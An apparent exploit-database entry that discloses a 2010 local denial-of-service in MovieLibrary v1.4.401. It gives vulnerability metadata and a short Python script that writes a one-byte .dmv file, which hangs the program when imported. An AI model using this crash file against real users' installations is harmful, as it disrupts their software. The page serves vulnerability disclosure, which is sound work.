header-logo
Suggest Exploit
vendor:
MovieLibrary
by:
anonymous
7,5
CVSS
HIGH
Local Denial of Service
400
CWE
Product Name: MovieLibrary
Affected Version From: v1.4.401
Affected Version To: v1.4.401
Patch Exists: Yes
Related CWE: N/A
CPE: a:wensoftware:movielibrary
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP3
2010

MovieLibrary Local Dos .dmv file

When a user clicks 'New' and then 'Open' in the MovieLibrary application, a new .dmv file is created. When the user then clicks 'File' and 'Import Database', the application will stop responding after about 5 seconds.

Mitigation:

Ensure that the application is updated to the latest version and that all security patches are applied.
Source

Exploit-DB raw data:

# Exploit Title: MovieLibrary Local Dos .dmv file
# Date: April 14, 2010
# Software Link: [http://wensoftware.com/]
# Version: v1.4.401
# Tested on: Windows XP SP3
# Author: [anonymous]
# Site: [www.setfreesecurity.com]
# 
# At the top: Click -> New -> Open
# Open the newly created dmv file
# Click File ->  Import Database
# Program will stop responding after about 5 sec
#
# Greetz to the Exploit-DB Crew and More Coffee!
# I AM YOU
#
#!/usr/bin/env python
import time

print "Press Play >\n"
time.sleep(1)

VHS=open('oldies.dmv', 'w')
VHS.write('\x00')
VHS.close()

print 'Running Time: Approximately 5 sec till DoS.\n'